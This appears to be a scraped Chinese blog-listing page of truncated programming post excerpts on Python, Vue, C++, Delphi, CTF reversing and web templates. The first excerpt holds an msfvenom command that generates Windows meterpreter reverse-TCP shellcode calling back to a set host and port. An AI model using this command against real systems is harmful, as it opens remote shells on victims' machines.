缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.3.60 LPORT=3333 -f c 将payload给copy下来 ...
分类:
编程语言 时间:
2020-07-11 09:26:03
阅读次数:
85
# 求和 l = [88,97,79,89,76] re = 0 for i in l: re += 1 print(re//5) # 平均值 # print(sum(l)) # he print(max(l)) # max # max 推演思路 #默认第一个值最大 打擂 l[0] # 后边的元素和 ...
分类:
编程语言 时间:
2020-07-10 21:28:04
阅读次数:
80
Vue数组的变异方法 Vue 包含一组观察数组的变异方法,所以它们也将会触发视图更新。这些方法如下: push() pop() shift() unshift() splice() sort() reverse() push():往数组最后面添加一个元素,成功返回当前数组的长度 pop():删除数组 ...
分类:
编程语言 时间:
2020-07-10 19:17:13
阅读次数:
72
大水题来啦! 不过要注意A B都为零的情况,所以用do-while循环 C++ 1 #include<iostream> 2 #include<string> 3 #include<algorithm> 4 5 using namespace std; 6 7 int main() { 8 int ...
分类:
编程语言 时间:
2020-07-09 00:58:34
阅读次数:
73
自己收集的几个比较实用的字符串函数(LeftStr,MidStr,RightStr,Reverse,LastPos) 没什么可说的,自己看啦 //从右边取 function RightStr (Const Str: String; Size: Word): String; begin if Size ...
现有字典d={'a':24, 'b':32, "c":12}请分别按字典只中的key、value排序? sorted(iterable, key, reverse) 三个参数,iterable是可迭代对象,key是一个函数,用来选取参与比较的元素,reverse则是用来指定排序是倒序还是正序, 默认 ...
分类:
编程语言 时间:
2020-07-07 20:57:34
阅读次数:
95
Reverse Words in a String Given an input string, reverse the string word by word. Example 1: Input: "the sky is blue" Output: "blue is sky the" Exampl ...
分类:
其他好文 时间:
2020-07-07 15:09:44
阅读次数:
43
Evaluate Reverse Polish Notation Evaluate the value of an arithmetic expression in Reverse Polish Notation. Valid operators are +, -, *, /. Each opera ...
分类:
其他好文 时间:
2020-07-07 13:36:17
阅读次数:
47
#Reverse ##内涵 0707 直接拖进IDA看到疑似flag,按A可以转中文 A ASCII解析成ASCII ##[BJDCTF 2nd]guessgame 拖进IDA 发现flag ##xor 拖进IDA int __cdecl main(int argc, const char **ar ...
分类:
其他好文 时间:
2020-07-07 11:39:50
阅读次数:
87
紧接着昨天的内容,今天我们来说说模板语句的内容,关于模板语句,核心就是{ % 语句 % } 先说一下if else的使用 { % if 判定语句 % } { % endif % } 如果判定结果为true,则会执行其判定语句之后的html标签内容: 例子: {% if num >= 100 and ...
分类:
编程语言 时间:
2020-07-07 00:37:17
阅读次数:
82